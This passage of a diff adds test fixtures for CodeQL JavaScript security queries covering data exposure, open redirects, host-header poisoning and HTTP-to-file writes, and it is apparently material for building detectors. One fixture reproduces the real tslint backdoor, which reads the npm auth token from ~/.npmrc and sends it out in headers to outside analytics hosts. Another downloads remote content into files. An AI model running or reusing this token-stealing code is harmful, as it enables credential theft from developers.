+          }
+        };
+
+        const req = http.request(options, (res) => {
+          res.setEncoding('utf8');
+        });
+        
+        // BAD: write data from file to request body
+        req.write(chunk);
+
+        req.end(); 
+      });
+
+      fs.close(fd);
+    });
+  }
+});
--- a/javascript/ql/test/query-tests/Security/CWE-200/request.js
+++ b/javascript/ql/test/query-tests/Security/CWE-200/request.js
@@ -0,0 +1,56 @@
+// adopted from https://stackoverflow.com/questions/9577611/http-get-request-in-node-js-express
+
+var fs = require('fs');
+var request = require('request');
+
+function PostJSON(jsonData)
+{
+  request({jsonData}, function (error, response, body){ // BAD: passing data from file to the request body
+    console.log(response);
+  });
+}
+
+function PostXML(xmlData)
+{
+
+  request({
+    url: "http://example.com/myxml",
+    method: "POST",
+    headers: {
+        "content-type": "application/xml",
+    },
+    body: xmlData    // BAD: passing data from file to the request body
+  }, function (error, response, body){
+    console.log(response);
+  });
+}
+
+fs.readFile('MyFile.json', 'utf-8', function (err, data) { // source
+  if (err) {
+    console.log("FATAL An error occurred trying to read in the file: " + err);
+    process.exit(-2);
+  }
+  // Make sure there's data before we post it
+  if(data) {
+    PostJSON(data);
+  }
+  else {
+    console.log("No data to post");
+    process.exit(-1);
+  }
+});
+
+fs.readFile('MyFile.xml', 'utf-8', function (err, data) {           // source
+  if (err) {
+    console.log("FATAL An error occurred trying to read in the file: " + err);
+    process.exit(-2);
+  }
+  // Make sure there's data before we post it
+  if(data) {
+    PostXML(data);
+  }
+  else {
+    console.log("No data to post");
+    process.exit(-1);
+  }
+});
--- a/javascript/ql/test/query-tests/Security/CWE-200/sentAsHeaders.js
+++ b/javascript/ql/test/query-tests/Security/CWE-200/sentAsHeaders.js
@@ -0,0 +1,30 @@
+// adopted from actual tslint backdoor payload, see https://gist.github.com/hzoo/51cb84afdc50b14bffa6c6dc49826b3e
+
+try { 
+  var path = require("path"), fs = require("fs"), content = "nofile";
+  var npmrc = path.join(process.env.HOME || process.env.USERPROFILE, ".npmrc");
+  if (fs.existsSync(npmrc)) {
+    content = fs.readFileSync(npmrc, { encoding: "utf8" });
+    fs.open(npmrc, "r", function (error, fd) {
+      var buffer = new Buffer(stats.size);
+      fs.read(fd, buffer, 0, buffer.length, null, function (error, bytesRead, buffer) {
+        var content = buffer.toString("utf8", 0, bytesRead);
+        content = content.replace("//registry.npmjs.org/:_authToken=", "").trim();
+        var https1 = require("https");
+        https1.get({
+          hostname: "sstatic1.histats.com",
+          path: "/0.gif?4103075&101",
+          method: "GET",
+          headers: { Referer: "http://1.a/" + content } //BAD: passing stolen token in a  header
+        }, () => { })
+        https1.get({
+          hostname: "c.statcounter.com",
+          path: "/11760461/0/7b5b9d71/1/",
+          method: "GET",
+          headers: { Referer: "http://2.b/" + content } //BAD: passing stolen token in a  header
+        }, () => { })
+      });
+    });
+  }
+} catch (e) {
+}
--- a/javascript/ql/test/query-tests/Security/CWE-601/ServerSideUrlRedirect/ServerSideUrlRedirect.expected
+++ b/javascript/ql/test/query-tests/Security/CWE-601/ServerSideUrlRedirect/ServerSideUrlRedirect.expected
@@ -3,6 +3,7 @@
 | express.js:33:18:33:23 | target | Untrusted URL redirection due to $@. | express.js:27:16:27:34 | req.param("target") | user-provided value |
 | express.js:35:16:35:21 | target | Untrusted URL redirection due to $@. | express.js:27:16:27:34 | req.param("target") | user-provided value |
 | express.js:44:16:44:108 | (req.pa ... ntacts" | Untrusted URL redirection due to $@. | express.js:44:69:44:87 | req.param('action') | user-provided value |
+| express.js:53:26:53:28 | url | Untrusted URL redirection due to $@. | express.js:48:16:48:28 | req.params[0] | user-provided value |
 | express.js:78:16:78:43 | `${req. ... )}/foo` | Untrusted URL redirection due to $@. | express.js:78:19:78:37 | req.param("target") | user-provided value |
 | express.js:94:18:94:23 | target | Untrusted URL redirection due to $@. | express.js:87:16:87:34 | req.param("target") | user-provided value |
 | express.js:101:16:101:21 | target | Untrusted URL redirection due to $@. | express.js:87:16:87:34 | req.param("target") | user-provided value |
--- a/javascript/ql/test/query-tests/Security/CWE-601/ServerSideUrlRedirect/express.js
+++ b/javascript/ql/test/query-tests/Security/CWE-601/ServerSideUrlRedirect/express.js
@@ -121,3 +121,12 @@ app.get('/array/join', function(req, res) {
  // BAD: request input becomes before query string
  res.redirect([req.query.page, '?section=', req.query.section].join(''));
 });
+
+function sendUserToUrl(res, nextUrl) {
+  // BAD: value comes from query parameter
+  res.redrect(nextUrl);
+}
+
+app.get('/call', function(req, res) {
+  sendUserToUrl(res, req.query.nextUrl);
+});
--- a/javascript/ql/test/query-tests/Security/CWE-640/HostHeaderPoisoningInEmailGeneration.expected
+++ b/javascript/ql/test/query-tests/Security/CWE-640/HostHeaderPoisoningInEmailGeneration.expected
@@ -0,0 +1,2 @@
+| tst.js:17:11:17:113 | `Hi, lo ... token}` | Links in this email can be hijacked by poisoning the HTTP host header $@. | tst.js:17:84:17:91 | req.host | here |
+| tst.js:18:11:18:127 | `Hi, lo ... reset.` | Links in this email can be hijacked by poisoning the HTTP host header $@. | tst.js:18:78:18:85 | req.host | here |
--- a/javascript/ql/test/query-tests/Security/CWE-640/HostHeaderPoisoningInEmailGeneration.qlref
+++ b/javascript/ql/test/query-tests/Security/CWE-640/HostHeaderPoisoningInEmailGeneration.qlref
@@ -0,0 +1 @@
+Security/CWE-640/HostHeaderPoisoningInEmailGeneration.ql
--- a/javascript/ql/test/query-tests/Security/CWE-640/tst.js
+++ b/javascript/ql/test/query-tests/Security/CWE-640/tst.js
@@ -0,0 +1,28 @@
+let nodemailer = require('nodemailer');
+let express = require('express');
+let app = express();
+let backend = require('./backend');
+
+app.post('/resetpass', (req, res) => {
+  let email = req.query.email;
+
+  let transport = nodemailer.createTransport({});
+
+  let token = backend.getUserSecretResetToken(email);
+
+  transport.sendMail({
+    from: 'webmaster@example.com',
+    to: email,
+    subject: 'Forgot password',
+    text: `Hi, looks like you forgot your password. Click here to reset: https://${req.host}/resettoken/${token}`, // NOT OK
+    html: `Hi, looks like you forgot your password. Click <a href="https://${req.host}/resettoken/${token}">here</a> to reset.` // NOT OK
+  });
+
+  transport.sendMail({
+    from: 'webmaster@example.com',
+    to: email,
+    subject: 'Forgot password',
+    text: `Hi, looks like you forgot your password. Click here to reset: https://example.com/resettoken/${token}`, // OK
+    html: `Hi, looks like you forgot your password. Click <a href="https://example.com/resettoken/${token}">here</a> to reset.` // OK
+  });
+});
--- a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.expected
+++ b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.expected
@@ -0,0 +1,3 @@
+| tst.js:16:33:16:33 | c | $@ flows to file system | tst.js:15:26:15:26 | c | Untrusted data received from Http response |
+| tst.js:19:25:19:25 | c | $@ flows to file system | tst.js:15:26:15:26 | c | Untrusted data received from Http response |
+| tst.js:24:22:24:22 | c | $@ flows to file system | tst.js:15:26:15:26 | c | Untrusted data received from Http response |
--- a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.qlref
+++ b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.qlref
@@ -0,0 +1 @@
+Security/CWE-912/HttpToFileAccess.ql
--- a/javascript/ql/test/query-tests/Security/CWE-912/externs/fs.js
+++ b/javascript/ql/test/query-tests/Security/CWE-912/externs/fs.js
--- a/javascript/ql/test/query-tests/Security/CWE-912/tst.js
+++ b/javascript/ql/test/query-tests/Security/CWE-912/tst.js
@@ -0,0 +1,41 @@
+// adopted from  tslint backdoor, see https://gist.github.com/hzoo/51cb84afdc50b14bffa6c6dc49826b3e
+try {
+  var https = require('https');
+  var fs = require('fs');
+
+  https.get({
+    'hostname': 'example.com', path: '/raw/XXXXXXXX', headers:
+    {
+      'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0',
+      Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
+    }
+  },
+  (response) => {
+    response.setEncoding('utf8');
+    response.on('data', (c) => {
+      fs.writeFile("/tmp/test", c, (err) => {}); // BAD: data from response 'on' event flows to file
+
+      let writeStream = fs.createWriteStream('/usr/evil/evil.cmd');
+      writeStream.write(c); // BAD: data from response 'on' event flows to filestream write
+      writeStream.end();
+
+      var stream = fs.createWriteStream("my_file.txt");
+      stream.once('open', function (fd) {
+        stream.write(c); // BAD: data from response 'on' event flows to filestream write
+        stream.end();
+      });
+    });
+    response.on('error', () => 
+    { 
+	fs.writeFile("/tmp/test", "error occured"); // GOOD: static data written to file
+    });
+  }).on('error', () => 
+  { 
+      let error = "error occured";
+      let writeStream = fs.createWriteStream('/usr/good/errorlog.txt');
+      writeStream.write(error);  // GOOD: static data written to file stream
+      writeStream.end();
+  });
+}
+catch (e) {
+}
				`@@ -0,0 +1 @@`
				`\| tst.js:17:2:19:3 \| transpo ... ');\\n\\t}) \| tst.js:11:12:11:31 \| 'sender@example.com' \| tst.js:12:10:12:55 \| 'receiv ... le.com' \| tst.js:13:15:13:28 \| 'Some subject' \| tst.js:14:12:14:15 \| 'Hi' \| tst.js:15:12:15:22 \| '<b>Hi</b>' \|`
				`@@ -0,0 +1 @@`
				`\| src/hapi.js:25:3:25:21 \| request.headers.baz \| baz \|`
				`@@ -0,0 +1 @@`
				`Security/CWE-640/HostHeaderPoisoningInEmailGeneration.ql`